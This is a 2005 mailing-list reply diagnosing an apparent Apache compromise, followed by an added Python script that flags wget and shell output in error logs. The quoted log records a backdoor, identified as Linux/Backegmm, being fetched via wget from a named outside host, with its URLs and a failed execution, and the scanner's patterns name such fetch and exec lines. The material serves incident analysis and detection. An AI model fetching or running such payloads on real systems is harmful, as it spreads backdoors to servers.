Re: backdoor named tvic / Kayten / ttyshd download in apache logfile
From: Chris Kronberg (smil_at_agleia.de)
Date: 04/24/05
- Previous message: Henning: "backdoor named tvic / Kayten / ttyshd download in apache logfile"
- In reply to: Henning: "backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Next in thread: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Reply: Henning: "Re: backdoor named tvic / Kayten / ttyshd download in apache logfile"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 24 Apr 2005 17:25:39 GMT
Henning wrote in article <7d202f03.0504221425.280c724e@posting.google.com>:
> Hi,
>
> I found interesting lines in my apache2 error.log. They are not in the
> log format.
> It looks like a wget output. There was a file downloaded. I found this
> file and it seems to be a backdoor.
> In the ELF binary named tvic: 'Kayten Start backdoor for you'.
> What is this? And how can my apache download this?
> I found no normal access/error entries at that timestamp 16:30 to 16:32
> with active perl/php access.
> The tvic file is still on that server (ilovekida.com <- this is not
> mine).
Downloaded both of them for analysis. The first one identifies as
Linux/Backegmm virus, the second one might be exactly what strings
reveal: an open webmail client, presumably for spamming. I filed
that one with some antivirus vendors. Their equipment is much better
than mine. :-)
Concerning your question: Do you have any cgi script running on
your webserver? People try that every now and again. Yet I have
never seen any entry like that in my log files.
The other reason I can think of is that, for whatever reason,
another application is writing to the file descriptor of the error
log. If this is the case, your system might be in real trouble.
Cheers,
Chris.
> Log quote
> Snip
>
> [Thu Apr 21 15:50:32 2005] [error] [client **********] File does not
> exist: ******
> --16:31:28-- http://www.ilovekida.com/ttyshd
> => `ttyshd'
> Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
> 68.142.234.38, ...
> Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 19,179 [application/octet-stream]
> ttyshd: Permission denied
>
> Cannot write to `ttyshd' (Permission denied).
> --16:32:11-- http://www.ilovekida.com/v1c11/tvic
> => `tvic'
> Resolving www.ilovekida.com... 68.142.234.38, 68.142.234.36,
> 68.142.234.37, ...
> Connecting to www.ilovekida.com[68.142.234.38]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 17,856 [application/octet-stream]
> tvic: Permission denied
>
> Cannot write to `tvic' (Permission denied).
> sh: line 1: ./ttyshd: Permission denied
> chmod: changing permissions of `ttyshd': Operation not permitted
> sh: line 1: ./ttyshd: Permission denied
> sh: line 1: ttyshd: command not found
> --16:35:01-- http://www.ilovekida.com/v1c11/tvic
> => `tvic'
> Resolving www.ilovekida.com... 68.142.234.40, 68.142.234.77,
> 68.142.234.38, ...
> Connecting to www.ilovekida.com[68.142.234.40]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 17,856 [application/octet-stream]
>
> 0K .......... ....... 100%
> 87.46 KB/s
>
> 16:35:02 (87.46 KB/s) - `tvic' saved [17856/17856]
>
> [Thu Apr 21 16:50:29 2005] [error] [client *****] Name "main::path"
> used only once: possible typo at ********
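One way to check an error log for exactly this symptom, lines that are not in Apache's own entry format and that look like wget or shell stderr, written as an added example that is not from the thread. The log sample is constructed, with placeholder hostname and addresses, and mirrors the shape of the output quoted above.

```python
import re

# Constructed sample of an apache2 error.log: a CGI script's stderr (shell
# and wget output) is interleaved with Apache's own "[date] [level]" entries.
SAMPLE_LOG = """\
[Thu Apr 21 15:50:32 2005] [error] [client 10.0.0.5] File does not exist: /var/www/x
--16:31:28-- http://www.example.invalid/ttyshd
Resolving www.example.invalid... 192.0.2.10
HTTP request sent, awaiting response... 200 OK
Length: 19,179 [application/octet-stream]
Cannot write to `ttyshd' (Permission denied).
sh: line 1: ./ttyshd: Permission denied
chmod: changing permissions of `ttyshd': Operation not permitted
16:35:02 (87.46 KB/s) - `tvic' saved [17856/17856]
[Thu Apr 21 16:50:29 2005] [error] [client 10.0.0.5] Name "main::path" used only once
"""

# A genuine Apache 2.0 error-log entry starts with "[Day Mon dd hh:mm:ss yyyy] [level]".
APACHE_ENTRY = re.compile(r"^\[\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}\] \[\w+\]")

# Lines typical of wget and /bin/sh stderr; group 1 is the detail worth reporting.
INDICATORS = [
    ("wget_fetch", re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")),
    ("wget_saved", re.compile(r"^\d\d:\d\d:\d\d \(.*\) - `([^']+)' saved")),
    ("wget_write_denied", re.compile(r"^Cannot write to `([^']+)'")),
    ("shell_exec", re.compile(r"^sh: line \d+: (\S+):")),
    ("chmod", re.compile(r"^chmod: changing permissions of `([^']+)'")),
]

def scan_error_log(text):
    """Return (foreign_lines, findings) for the text of an Apache error log.

    foreign_lines counts non-empty lines that are not in Apache's own entry
    format; findings lists (kind, detail) for those that look like wget or
    shell output, i.e. evidence that some other process wrote to the log's fd.
    """
    foreign, findings = 0, []
    for line in text.splitlines():
        if not line.strip() or APACHE_ENTRY.match(line):
            continue
        foreign += 1
        for kind, pattern in INDICATORS:
            m = pattern.match(line)
            if m:
                findings.append((kind, m.group(1)))
                break
    return foreign, findings

if __name__ == "__main__":
    print(scan_error_log(SAMPLE_LOG))
```

Any non-zero foreign count on a production error log deserves a look even without a wget indicator, since Apache itself only ever writes bracketed entries there.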